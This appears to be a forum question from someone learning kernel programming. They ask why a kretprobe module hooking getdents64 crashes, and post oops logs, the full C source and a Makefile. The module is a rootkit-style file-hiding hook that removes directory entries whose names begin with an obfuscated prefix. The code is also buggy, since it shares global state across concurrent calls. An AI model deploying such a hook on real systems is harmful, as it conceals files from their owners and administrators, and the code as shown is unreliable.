Random crashes in kretprobe on getdents()

I’m trying to learn Linux kernel programming by following and redoing some existing projects that I find interesting. In this case, I tried to modify the data that is returned by getdents() by hooking it with a kretprobe.

I could do that successfully and managed to modify the data, but I started to get some random crashes! Below is the crash log I’m getting:

<code>Jun 21 08:05:39 xubun2204 kernel: [ 1413.166586] audit: type=1400 audit(1718953539.095:66): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=12 capname="net_admin"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.166593] audit: type=1400 audit(1718953539.095:67): apparmor="DENIED" operation="capable" profile="/usr/lib/snapd/snap-confine" pid=4333 comm="snap-confine" capability=38 capname="perfmon"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] audit: type=1107 audit(1718953539.883:68): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953050] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] audit: type=1107 audit(1718953539.883:69): pid=747 uid=102 auid=4294967295 ses=4294967295 subj=unconfined msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/org/freedesktop/timedate1" interface="org.freedesktop.DBus.Properties" member="GetAll" mask="send" name=":1.128" pid=4333 label="snap.firefox.firefox" peer_pid=4511 peer_label="unconfined"
Jun 21 08:05:39 xubun2204 kernel: [ 1413.953564] exe="/usr/bin/dbus-daemon" sauid=102 hostname=? addr=? terminal=?'
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048570] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048576] #PF: supervisor read access in kernel mode
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048578] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048580] PGD 0 P4D 0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048583] Oops: 0000 [#2] SMP NOPTI
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048585] CPU: 2 PID: 4837 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048588] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048590] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048596] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048598] RSP: 0018:ffffa5594520fd30 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048600] RAX: 0000000000000000 RBX: 0000000000000026 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048602] RDX: 0000000000008000 RSI: 00003c3400aec030 RDI: ffff8d5eb9660000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048603] RBP: ffffa5594520fd70 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048604] R10: 0000000000000246 R11: ffff8d5f35eb8760 R12: ffff8d5eb9658000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048606] R13: 0000000000008000 R14: 00000000000000d0 R15: 00000000000000d0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048607] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048609] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048610] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048625] PKRU: 55555554
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048626] Call Trace:
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048628] <TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048629] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048634] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048637] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048641] ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048646] ? show_regs.part.0+0x23/0x29
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048647] ? __die_body.cold+0x8/0xd
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048649] ? __die+0x2b/0x37
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048651] ? page_fault_oops+0x13b/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048655] ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048658] ? exc_page_fault+0x77/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048661] ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048666] ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048669] ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048672] __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048675] trampoline_handler+0x41/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048677] __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048679] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048680] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048682] RSP: 4520ff48:ffffa5594520fe78 EFLAGS: 00000246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048684] RAX: 00000000000000d0 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048685] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8a8a1700
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048686] RBP: ffffa5594520fe78 R08: ffff8d5e152a0800 R09: ffff8d5e8c595cf8
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048688] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa5594520ff58
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048689] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048692] ? do_syscall_64+0x56/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048694] ? handle_mm_fault+0xd8/0x2c0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048698] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048700] ? do_user_addr_fault+0x1e7/0x670
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048702] ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048707] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048709] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048717] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048718] ? irqentry_exit_to_user_mode+0x17/0x20
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048720] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048722] ? irqentry_exit+0x1d/0x30
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048723] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048725] ? exc_page_fault+0x89/0x170
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048727] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048732] </TASK>
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048734] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048796] CR2: 0000000000000018
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048798] ---[ end trace ed478a6b988e964c ]---
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048799] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048802] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048804] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048806] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048807] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048809] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048810] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048811] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048813] FS: 00007faa617cd640(0000) GS:ffff8d5f35e80000(0000) knlGS:0000000000000000
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048814] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048816] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:42 xubun2204 kernel: [ 1417.048846] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141480] BUG: kernel NULL pointer dereference, address: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141485] #PF: supervisor read access in kernel mode
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141487] #PF: error_code(0x0000) - not-present page
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141489] PGD 0 P4D 0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141492] Oops: 0000 [#3] SMP NOPTI
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141494] CPU: 1 PID: 4836 Comm: code Tainted: G D OE 5.15.0-112-generic #122-Ubuntu
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141498] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141500] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141506] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141508] RSP: 0018:ffffa559451ffcf0 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141510] RAX: 0000000000000000 RBX: 0000000000000032 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141512] RDX: 0000000000008000 RSI: 00003c34012dc030 RDI: ffff8d5ec33d0000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141513] RBP: ffffa559451ffd30 R08: 0000000000000000 R09: 0000000000000008
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141514] R10: 0000000000000246 R11: ffff8d5f35e78760 R12: ffff8d5ec33c8000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141516] R13: 0000000000008000 R14: 00000000000000c8 R15: 00000000000000c8
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141517] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141519] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141520] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141534] PKRU: 55555554
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141535] Call Trace:
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141537] <TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141538] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141542] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141546] ? show_trace_log_lvl+0x28e/0x2ea
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141550] ? __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141554] ? show_regs.part.0+0x23/0x29
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141555] ? __die_body.cold+0x8/0xd
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141557] ? __die+0x2b/0x37
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141559] ? page_fault_oops+0x13b/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141563] ? do_user_addr_fault+0x321/0x670
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141566] ? exc_page_fault+0x77/0x170
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141569] ? asm_exc_page_fault+0x27/0x30
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141574] ? handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141576] ? x64_sys_call+0xf63/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141580] __kretprobe_trampoline_handler+0xb4/0x140
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141582] trampoline_handler+0x41/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141585] __kretprobe_trampoline+0x2a/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141587] RIP: 0010:__kretprobe_trampoline+0x0/0x60
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141589] Code: 89 fc e8 a3 d8 01 00 4c 89 f2 4c 89 ee 4c 89 e7 44 0f b6 c0 31 c9 e8 6f a2 3b 00 41 5c 41 5d 41 5e 5d e9 93 ce f6 00 cc cc cc <54> 9c 48 83 ec 18 57 56 52 51 50 41 50 41 51 41 52 41 53 53 55 41
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141590] RSP: 451fff48:ffffa559451ffe38 EFLAGS: 00000246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141592] RAX: 00000000000000c8 RBX: 0000000000000000 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141593] RDX: 0000000000000000 RSI: 0000000000000001 RDI: ffff8d5e8983a900
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141594] RBP: ffffa559451ffe38 R08: ffff8d5e152a0800 R09: ffff8d5e8c596628
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141596] R10: 0000000000000001 R11: 0000000040000001 R12: ffffa559451fff58
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141597] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141600] ? do_syscall_64+0x56/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141603] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141605] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141608] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141610] ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141612] ? x64_sys_call+0x1a81/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141614] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141615] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141617] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141619] ? __x64_sys_openat+0x55/0x90
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141622] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141624] ? exit_to_user_mode_prepare+0x37/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141626] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141628] ? syscall_exit_to_user_mode+0x35/0x50
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141629] ? x64_sys_call+0x1a55/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141631] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141633] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141635] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141637] ? x64_sys_call+0x1022/0x1fa0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141639] ? srso_alias_return_thunk+0x5/0x7f
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141640] ? do_syscall_64+0x63/0xb0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141643] ? entry_SYSCALL_64_after_hwframe+0x67/0xd1
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141646] </TASK>
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141648] Modules linked in: hidproc(E) intel_rapl_msr intel_rapl_common vsock_loopback vmw_vsock_virtio_transport_common kvm_amd ccp vmw_vsock_vmci_transport vmw_balloon vsock kvm crct10dif_pclmul ghash_clmulni_intel snd_ens1371 sha256_ssse3 sha1_ssse3 binfmt_misc snd_ac97_codec gameport aesni_intel ac97_bus crypto_simd cryptd snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi nls_iso8859_1 input_leds snd_seq joydev serio_raw snd_seq_device snd_timer snd soundcore vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid crc32_pclmul mptspi mptscsih psmouse mptbase ahci libahci scsi_transport_spi i2c_piix4 e1000 pata_acpi [last unloaded: rootkit]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141704] CR2: 0000000000000018
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141706] ---[ end trace ed478a6b988e964d ]---
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141707] RIP: 0010:handler_ret_getdents64+0xe9/0x240 [hidproc]
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141709] Code: 00 00 4d 85 ff 0f 8e 48 01 00 00 65 48 8b 04 25 c0 fb 01 00 48 8b 80 00 0c 00 00 45 31 c0 48 8b 40 20 48 8b 40 08 48 8b 04 d8 <48> 8b 40 18 48 8b 40 30 48 83 78 40 01 0f 84 c1 00 00 00 4c 89 e0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141711] RSP: 0018:ffffa55945733da8 EFLAGS: 00010246
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141713] RAX: 0000000000000000 RBX: 0000000000000016 RCX: 0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141714] RDX: 0000000000000800 RSI: 00007f31727ca238 RDI: ffff8d5e0c665000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141715] RBP: ffffa55945733de8 R08: 0000000000000000 R09: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141716] R10: 0000000000000001 R11: 0000000040000001 R12: ffff8d5e0c664800
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141718] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141719] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141720] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141722] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0
Jun 21 08:05:43 xubun2204 kernel: [ 1417.141733] PKRU: 55555554
</code>
<code>
ffff8d5e0c664800 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141718] R13: 0000000000000800 R14: 0000000000000080 R15: 0000000000000080 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141719] FS: 00007faa61fce640(0000) GS:ffff8d5f35e40000(0000) knlGS:0000000000000000 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141720] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141722] CR2: 0000000000000018 CR3: 00000001e0c94000 CR4: 0000000000750ee0 Jun 21 08:05:43 xubun2204 kernel: [ 1417.141733] PKRU: 55555554 </code>

The kernel code that gives me the above crash is the following:

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/unistd.h>
#include <linux/slab.h>
#include <linux/syscalls.h>
#include <linux/ptrace.h>
#include <linux/fs.h>
#include <linux/fdtable.h>
#include <asm/syscall.h>
#include <asm/ptrace.h>
#include <linux/sched.h>
#include <linux/dcache.h>
#include <linux/path.h>
#include <linux/kstrtox.h>
#include <linux/binfmts.h>
#include <linux/version.h>
#include <linux/proc_ns.h>

struct linux_dirent
{
    unsigned long   d_ino;
    unsigned long   d_off;
    unsigned short  d_reclen;
    char            d_name[];
};

struct linux_dirent64
{
    uint64_t        d_ino;
    int64_t         d_off;
    unsigned short  d_reclen;
    unsigned char   d_type;
    char            d_name[];
};




#define ROOTKIT_PATTERN                 "rk_"
#define ROOTKIT_PATTERN_LEN             4
#define GETDENTS_COUNT_UNINIT            9999888221
#define GETDENTS_FD_UNINIT               -1

spinlock_t spinlock_getdents64;

int g_fd;
struct linux_dirent64 *g_dirp = NULL;
unsigned long g_count = GETDENTS_COUNT_UNINIT;
unsigned long g_is_procfs = 0;

// getdents64 kretprobe
static int handler_entry_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
#if IS_ENABLED(CONFIG_X86_64)
    int fd = ((struct pt_regs*)regs->di)->di;
    void *dirv = (void *)((struct pt_regs*)regs->di)->si;
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
    unsigned long count = ((struct pt_regs*)regs->di)->dx;
#elif IS_ENABLED(CONFIG_ARM64)
    int fd = ((struct pt_regs*)regs->regs[0])->regs[0];
    void *dirv = (void *)((struct pt_regs*)regs->regs[0])->regs[1];
    struct linux_dirent64 *dirp = (struct linux_dirent64 *)dirv;
    unsigned long count = ((struct pt_regs*)regs->regs[0])->regs[2];
#endif

    spin_lock(&spinlock_getdents64);
    g_dirp = dirp;
    g_count = count;
    g_fd = fd;
    spin_unlock(&spinlock_getdents64);

    return 0;
}

static int handler_ret_getdents64(struct kretprobe_instance *ri, struct pt_regs *regs)
{
    int ret;
    long retval;
    long length;
    char* kdirp_buf = NULL;

    // Local copy of global variables
    int l_fd;
    unsigned long l_count;
    struct linux_dirent64 *l_dirp;
    struct inode *d_inode;

    spin_lock(&spinlock_getdents64);
    l_fd = g_fd;
    l_count = g_count;
    l_dirp = g_dirp;
    spin_unlock(&spinlock_getdents64);

    if ((l_dirp == NULL) || (l_count == GETDENTS_COUNT_UNINIT))
    {
        printk("[handler_ret]\t\tINITIALIZATION FAILED\n");
        return 0;
    }

    retval = regs_return_value(regs);

#if IS_ENABLED(CONFIG_X86_64)
    length = l_count;
#elif IS_ENABLED(CONFIG_ARM64)
    length = retval;
#endif

    kdirp_buf = kzalloc(length, GFP_KERNEL);
    if (kdirp_buf == NULL)
    {
        printk("ERR kmalloc() failed!\n");
        return 0;
    }

    ret = copy_from_user(kdirp_buf, l_dirp, length);
    if (ret != 0)
    {
        // printk("ERR copy_from_user() failed %d!\n", ret);
        kfree(kdirp_buf);
        return 0;
    }

    if (retval <= 0)
    {
        kfree(kdirp_buf);
        return retval;
    }

    if (retval != 0)
    {
        unsigned long offset = 0;
        struct linux_dirent64 *d = NULL;
        struct linux_dirent64 *prev_d = NULL;
        unsigned short proc = 0;

#if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0)
        d_inode = current->files->fdt->fd[l_fd]->f_dentry->d_inode;
#else
        d_inode = current->files->fdt->fd[l_fd]->f_path.dentry->d_inode;
#endif

        if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev))
        {
            proc = 1;
        }

        while (offset <= length)
        // while (offset < retval)
        {
            d = (struct linux_dirent64 *)(kdirp_buf + offset);
            if (!d || offset + d->d_reclen > retval || d->d_reclen == 0) 
            {
                break;
            }

            if ((proc == 0) && ((d->d_name[0] == 114) && (d->d_name[1] == 54) && (d->d_name[2] == 57) && (d->d_name[3] == 107)))
            {
                if (d == (struct linux_dirent64 *)kdirp_buf)
                {
                    retval -= d->d_reclen;
                    memmove(d, (void *)d + d->d_reclen, retval);
                    continue;
                }

                prev_d->d_reclen += d->d_reclen;
            }
            else
            {
                prev_d = d;
            }
            offset += d->d_reclen;
        }
        ///
        ret = copy_to_user(l_dirp, kdirp_buf, length);
        regs_set_return_value(regs, retval);
    }

    kfree(kdirp_buf);

    return 0;
}

static struct kretprobe kretGetdents64 =
{
    .handler = handler_ret_getdents64,
    .entry_handler = handler_entry_getdents64,
    .kp.symbol_name = "__x64_sys_getdents64",
};

static int __init kretprobe_init(void)
{  
    int ret;
    spin_lock_init(&spinlock_getdents64);

    ret = register_kretprobe(&kretGetdents64);
    if (ret < 0)
    {
        printk("Failed registering kretprobe getdents64 %d!\n", ret);
        return ret;
    }

    return 0;
}

static void __exit kretprobe_exit(void)
{
    unregister_kretprobe(&kretGetdents64);
    printk("Unregistering kretprobe getdents64\n");
}

module_init(kretprobe_init)
module_exit(kretprobe_exit)
MODULE_LICENSE("GPL");

and the Makefile to compile the kernel module,

obj-m += hidproc.o
KBUILD_CFLAGS += -Wno-unused-function
CCFLAG-y := -O3 -flto -march=native -mtune=native -fomit-frame-pointer -funroll-loops -finline-functions

all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

I tried to narrow down the handler_ret_getdents64() code to see which part actually causes the crash, and the following block seems to be the issue here, but it’s hard to say as I don’t have an easy way to reproduce the crash,

            {
                if (d == (struct linux_dirent64 *)kdirp_buf)
                {
                    retval -= d->d_reclen;
                    memmove(d, (void *)d + d->d_reclen, retval);
                    continue;
                }

                prev_d->d_reclen += d->d_reclen;
            }

The crash is usually happening when I start several applications at the same time, Firefox, VSCode, Thunderbird.
